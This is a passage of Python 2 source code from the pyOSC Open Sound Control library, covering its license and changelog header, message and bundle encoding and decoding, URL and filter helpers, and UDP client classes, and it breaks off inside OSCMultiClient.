SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support for numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from SocketServer import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [types.FloatType]
global IntTypes
IntTypes = [types.IntType]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print msg
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
Additional methods exist for retrieving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address="", *args):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument.
The rest of the arguments are appended as data.
"""
self.clear(address)
if len(args)>0:
self.append(*args)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = ""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if type(argument) == types.DictType:
argument = argument.items()
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__'):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(self.values()))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(self.values())
if type(values) == types.TupleType:
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = self.values()
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in self.values())
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return self.values()[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = self.items()
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = values.items()
elif type(values) == types.ListType:
items = []
for val in values:
if type(val) == types.TupleType:
items.append(val[:2])
else:
items.append((typehint, val))
elif type(values) == types.TupleType:
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = self.items()
new_items = self._buildItemList(val)
if type(i) != types.SliceType:
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = self.items()
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return self.values().count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return self.values().index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = self.items() + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = self.items()
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = self.items()
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = self.items()
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
Raises ValueError if val isn't found.
"""
items = self.items()
# this is not very efficient...
i = 0
for (t, v) in items:
if (v == val):
break
i += 1
else:
raise ValueError("'%s' not in OSCMessage" % str(val))
# but more efficient than first calling self.values().index(val),
# then calling self.items(), which would in turn call self.values() again...
del items[i]
self._reencode(items)
def __iter__(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def __reversed__(self):
"""Returns a reverse iterator of the OSCMessage's arguments
"""
return reversed(self.values())
def itervalues(self):
"""Returns an iterator of the OSCMessage's arguments
"""
return iter(self.values())
def iteritems(self):
"""Returns an iterator of the OSCMessage's arguments as
(typetag, value) tuples
"""
return iter(self.items())
def itertags(self):
"""Returns an iterator of the OSCMessage's arguments' typetags
"""
return iter(self.tags())
class OSCBundle(OSCMessage):
"""Builds a 'bundle' of OSC messages.
OSCBundle objects are container objects for building OSC-bundles of OSC-messages.
An OSC-bundle is a special kind of OSC-message which contains a list of OSC-messages
(And yes, OSC-bundles may contain other OSC-bundles...)
OSCBundle objects behave much the same as OSCMessage objects, with these exceptions:
- if an item or items to be appended or inserted are not OSCMessage objects,
OSCMessage objects are created to encapsulate the item(s)
- an OSC-bundle does not have an address of its own, only the contained OSC-messages do.
The OSCBundle's 'address' is inherited by any OSCMessage the OSCBundle object creates.
- OSC-bundles have a timetag to tell the receiver when the bundle should be processed.
The default timetag value (0) means 'immediately'
"""
def __init__(self, address="", time=0):
"""Instantiate a new OSCBundle.
The default OSC-address for newly created OSCMessages
can be specified with the 'address' argument
The bundle's timetag can be set with the 'time' argument
"""
super(OSCBundle, self).__init__(address)
self.timetag = time
def __str__(self):
"""Returns the Bundle's contents (and timetag, if nonzero) as a string.
"""
if (self.timetag > 0.):
out = "#bundle (%s) [" % self.getTimeTagStr()
else:
out = "#bundle ["
if self.__len__():
for val in self.values():
out += "%s, " % str(val)
out = out[:-2] # strip trailing space and comma
return out + "]"
def setTimeTag(self, time):
"""Set or change the OSCBundle's TimeTag
In 'Python Time', that's floating seconds since the Epoch
"""
if time >= 0:
self.timetag = time
def getTimeTagStr(self):
"""Return the TimeTag as a human-readable string
"""
fract, secs = math.modf(self.timetag)
out = time.ctime(secs)[11:19]
out += ("%.3f" % fract)[1:]
return out
def append(self, argument, typehint = None):
"""Appends data to the bundle, creating an OSCMessage to encapsulate
the provided argument unless this is already an OSCMessage.
Any newly created OSCMessage inherits the OSCBundle's address at the time of creation.
If 'argument' is an iterable, its elements will be encapsulated by a single OSCMessage.
Finally, 'argument' can be (or contain) a dict, which will be 'converted' to an OSCMessage;
- if 'addr' appears in the dict, its value overrides the OSCBundle's address
- if 'args' appears in the dict, its value(s) become the OSCMessage's arguments
"""
if isinstance(argument, OSCMessage):
binary = OSCBlob(argument.getBinary())
else:
msg = OSCMessage(self.address)
if type(argument) == types.DictType:
if 'addr' in argument:
msg.setAddress(argument['addr'])
if 'args' in argument:
msg.append(argument['args'], typehint)
else:
msg.append(argument, typehint)
binary = OSCBlob(msg.getBinary())
self.message += binary
self.typetags += 'b'
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString("#bundle")
binary += OSCTimeTag(self.timetag)
binary += self.message
return binary
def _reencapsulate(self, decoded):
if decoded[0] == "#bundle":
msg = OSCBundle()
msg.setTimeTag(decoded[1])
for submsg in decoded[2:]:
msg.append(self._reencapsulate(submsg))
else:
msg = OSCMessage(decoded[0])
tags = decoded[1].lstrip(',')
for i in range(len(tags)):
msg.append(decoded[2+i], tags[i])
return msg
def values(self):
"""Returns a list of the OSCMessages appended so far
"""
out = []
for decoded in decodeOSC(self.getBinary())[2:]:
out.append(self._reencapsulate(decoded))
return out
def __eq__(self, other):
"""Return True if two OSCBundles have the same timetag & content
"""
if not isinstance(other, self.__class__):
return False
return (self.timetag == other.timetag) and (self.typetags == other.typetags) and (self.message == other.message)
def copy(self):
"""Returns a deep copy of this OSCBundle
"""
copy = super(OSCBundle, self).copy()
copy.timetag = self.timetag
return copy
######
#
# OSCMessage encoding functions
#
######
def OSCString(next):
"""Convert a string into a zero-padded OSC String.
The length of the resulting string is always a multiple of 4 bytes.
The string ends with 1 to 4 zero-bytes ('\x00')
"""
OSCstringLength = math.ceil((len(next)+1) / 4.0) * 4
return struct.pack(">%ds" % (OSCstringLength), str(next))
def OSCBlob(next):
"""Convert a string into an OSC Blob.
An OSC-Blob is a binary encoded block of data, prepended by a 'size' (int32).
The size is always a multiple of 4 bytes.
The blob ends with 0 to 3 zero-bytes ('\x00')
"""
if type(next) in types.StringTypes:
OSCblobLength = math.ceil((len(next)) / 4.0) * 4
binary = struct.pack(">i%ds" % (OSCblobLength), OSCblobLength, next)
else:
binary = ""
return binary
def OSCArgument(next, typehint=None):
""" Convert some Python types to their
OSC binary representations, returning a
(typetag, data) tuple.
"""
if not typehint:
if type(next) in FloatTypes:
binary = struct.pack(">f", float(next))
tag = 'f'
elif type(next) in IntTypes:
binary = struct.pack(">i", int(next))
tag = 'i'
else:
binary = OSCString(next)
tag = 's'
elif typehint == 'd':
try:
binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', long(secs), long(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0L, 1L)
return binary
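# Illustrative sketch (comments only): on the Python side a timetag is simply
# floating seconds since the Unix epoch, so a bundle the receiver should hold
# for roughly two seconds could be built like this (OSCBundle is defined above,
# 'time' is imported at the top of this module).
#
#     bundle = OSCBundle("/print")
#     bundle.setTimeTag(time.time() + 2.0)
#     bundle.append(42)
#     data = bundle.getBinary()   # starts with '#bundle' followed by the timetag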
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = string.find(data,"\0")
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length], data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print "Error: too few bytes for int", data, len(data)
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (long(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low) / NTP_units_per_second  # avoid integer division losing the fractional part
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print "Error: too few bytes for float", data, len(data)
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print "Error: too few bytes for double", data, len(data)
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
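# Round-trip sketch (comments only): build an OSCMessage, encode it with
# getBinary(), and decode it again with decodeOSC(). The decoded list has the
# form [address, typetags, arg1, arg2, ...], which is exactly what
# OSCMessage.values() slices at [2:].
#
#     msg = OSCMessage("/test")
#     msg.append(1)          # tag 'i'
#     msg.append(2.5)        # tag 'f'
#     msg.append("three")    # tag 's'
#     print decodeOSC(msg.getBinary())   # ['/test', ',ifs', 1, 2.5, 'three']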
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print "byte 0 1 2 3 4 5 6 7 8 9 A B C D E F"
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % ord(bytes[i])
if (i+1) % 16 == 0:
print "%s: %s" % (line, repr(bytes[i-15:i+1]))
line = ""
bytes_left = num % 16
if bytes_left:
print "%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:]))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == types.TupleType:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if type(port) == types.IntType:
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (type(url) in types.StringTypes and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
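# Small sketch (comments only): parseUrlStr splits a 'host:port/prefix' string
# into ((host, port), prefix); the exact host value depends on local name
# resolution, so the output shown is only indicative.
#
#     addr, prefix = parseUrlStr("localhost:9000/synth")
#     print addr     # e.g. ('127.0.0.1', 9000) after gethostbyname()
#     print prefix   # '/synth'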
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
self.setServer(server)
self.client_address = None
self._fd = None
def _setSocket(self, skt):
"""Set and configure client socket"""
if self.socket != None:
self.close()
self.socket = skt
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
# phillip: set multicast TTL
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
self._fd = self.socket.fileno()
def _ensureConnected(self, address):
"""Make sure client has a socket connected to address"""
if not self.socket:
if len(address) == 4:
address_family = socket.AF_INET6
else:
address_family = socket.AF_INET
self._setSocket(socket.socket(address_family, socket.SOCK_DGRAM))
self.socket.connect(address)
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if server == None:
if hasattr(self,'server') and self.server:
if self.server.client != self:
raise OSCClientError("Internal inconsistency")
self.server.client.close()
self.server.client = None
self.server = None
return
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
self._setSocket(server.socket.dup())
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
if self.socket and other.socket:
sockEqual = (cmp(self.socket._sock, other.socket._sock) == 0)
else:
sockEqual = (self.socket == None and other.socket == None)
if not sockEqual:
return False
if self.server and other.server:
return cmp(self.server, other.server) == 0
else:
return self.server == None and other.server == None
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
if self.socket:
return self.socket.getpeername()
else:
return None
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self._ensureConnected(address)
self.client_address = address
except socket.error, e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifying the remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except ValueError:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self._ensureConnected(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
if not self.socket:
raise OSCClientError("Called send() on non-connected client")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except ValueError:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error, e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if type(args) in types.StringTypes:
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in filters.keys():
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in filters.values():
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in filters.items():
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
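# Sketch of the filter-string round trip (comments only): parseFilterStr turns
# a '+<addr> -<addr>' string into a {addr: bool} dict (plus an optional leading
# prefix), and getFilterStr converts such a dict back into filter strings.
# Dict ordering may vary.
#
#     prefix, filters = parseFilterStr("/synth +/volume -/debug")
#     print prefix                 # '/synth'
#     print filters                # {'/volume': True, '/debug': False}
#     print getFilterStr(filters)  # e.g. ['+/*', '+/volume', '-/debug']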
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = string.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
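# Sketch of OSC address-pattern matching (comments only): getRegEx translates
# OSC wildcards such as '*' and '?' into a Python regular expression, so an
# incoming address can be tested against a registered pattern.
#
#     regex = getRegEx("/mixer/channel/?/fader")
#     print bool(regex.match("/mixer/channel/3/fader"))   # True
#     print bool(regex.match("/mixer/master/fader"))      # False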
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets'. and sends each OSCMessage to each OSCTarget
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
the OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in self.targets.keys():
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in src.keys(): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in src.items():
if (addr in dst.keys()) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in self.targets.keys():
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if type(filters) in types.StringTypes:
(_, filters) = parseFilterStr(filters)
elif type(filters) != types.DictType:
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
